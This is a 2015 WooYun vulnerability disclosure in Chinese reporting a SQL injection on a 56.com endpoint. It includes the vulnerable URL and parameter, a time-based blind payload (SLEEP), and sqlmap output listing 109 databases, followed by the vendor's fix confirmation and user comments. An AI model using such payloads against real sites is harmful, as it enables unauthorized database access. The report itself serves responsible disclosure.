缺陷编号:WooYun-2015-0127431
漏洞标题:56网某站站点SQL注入漏洞109个库
相关厂商:56.com
漏洞作者:紫霞仙子
提交时间:2015-07-17 19:08
公开时间:2015-08-31 19:26
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:12
漏洞状态:厂商已经确认
Tags标签:
2015-07-17: 细节已通知厂商并且等待厂商处理中
2015-07-17: 厂商已经确认,细节仅向厂商公开
2015-07-27: 细节向核心白帽子及相关领域专家公开
2015-08-06: 细节向普通白帽子公开
2015-08-16: 细节向实习白帽子公开
2015-08-31: 细节向公众公开
#Nowall#
1 2 |
dv.56.com/hongren/?do=AjaxAdsData&order=11&pn=1&ps=12&type=12参数order<br> sqlmap没跑出来1=1盲注,就不写payload了 |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 |
---<br> Parameter: order (GET)<br> Type: AND/OR time-based blind<br> Title: MySQL >= 5.0.12 AND time-based blind<br> Payload: do=AjaxAdsData&order=11 AND SLEEP(5)&pn=1&ps=12&type=12<br> ---<br>back-end DBMS: MySQL 5.0.12current user: '[email protected]%'available databases [109]:<br> [*] `56youth`<br> [*] `ask and answer`<br> [*] `hd`caihong_2011`<br> [*] alan<br> [*] ayumi<br> [*] bak_lyhiving<br> [*] btws<br> [*] caihong<br> [*] caihong_60plus<br> [*] caihong_arborday<br> [*] caihong_gongyi<br> [*] channel<br> [*] channel_huodong_2012<br> [*] coco<br> [*] daxiaoyifang<br> [*] disney<br> [*] djyx<br> [*] dvspy<br> [*] end_year_2012<br> [*] endyear2013<br> [*] fcwr2011<br> [*] fun_top<br> [*] games2009<br> [*] girl09<br> [*] guanwang_ayu<br> [*] guanwang_boa<br> [*] guanwang_chris<br> [*] guanwang_david<br> [*] gz2010<br> [*] hd_funny2012<br> [*] hd_gz2010<br> [*] hd_gz2010_photo<br> [*] hd_ndshipin<br> [*] hd_wahaha<br> [*] hd_xzb<br> [*] hd_yulerili_2011<br> [*] heishehui<br> [*] hitea<br> [*] hsm<br> [*] hubei<br> [*] huodong_2012_biye<br> [*] huodong_2012_dreamlist<br> [*] huodong_361<br> [*] huodong_60years<br> [*] huodong_60years_hgh<br> [*] huodong_60years_tv<br> [*] huodong_asia<br> [*] huodong_asia_old<br> [*] huodong_baby_cartoon<br> [*] huodong_baby_cartoon_2010<br> [*] huodong_baby_fengmian<br> [*] huodong_brand<br> [*] huodong_byd<br> [*] huodong_crazysurvival<br> [*] huodong_dlhc<br> [*] huodong_hongren<br> [*] huodong_interview<br> [*] huodong_jiehun<br> [*] huodong_missinter<br> [*] huodong_oscar<br> [*] huodong_paike<br> [*] huodong_qmjs<br> [*] huodong_roc<br> [*] huodong_school<br> [*] huodong_school_visionyouth<br> [*] huodong_szy_2011<br> [*] huodong_tybros<br> [*] huodong_tydr<br> [*] huodong_xgdd<br> [*] huodong_ycsyl<br> [*] huodong_ycsyl_syl2012<br> [*] huodong_zbc<br> [*] huodong_zgzqy_2013<br> [*] huodong_zjh<br> [*] information_schema<br> [*] jiemu<br> [*] melon_wp<br> [*] mothersday<br> [*] music_best<br> [*] mxyh<br> [*] mysql<br> [*] mystyle<br> [*] new_mm<br> [*] new_spec_sys<br> [*] olympic_2012<br> [*] paike<br> [*] performance_schema<br> [*] shanliang<br> [*] she<br> [*] special<br> [*] super<br> [*] tb2014<br> [*] tellstory<br> [*] test<br> [*] topic<br> [*] topmusic<br> [*] uaction_video<br> [*] weekly<br> [*] world_cup_2010<br> [*] worldcup_game<br> [*] xing<br> [*] xy<br> [*] ycsyl2014<br> [*] yeah<br> [*] yyj<br> [*] zhibo<br> [*] zyhl |
fix
危害等级:高
漏洞Rank:15
确认时间:2015-07-1719:25
已修复
2015-08-31:感谢提醒
首页上洞都是你的,仙子要冲榜~~~
@null_z 今天峰会啊!
@紫霞仙子 仙子收徒不~~
发现你要么中ajax,要么api啊
@BeenQuiver 悄悄的
原文连接
的情况下转载,若非则不得使用我方内容。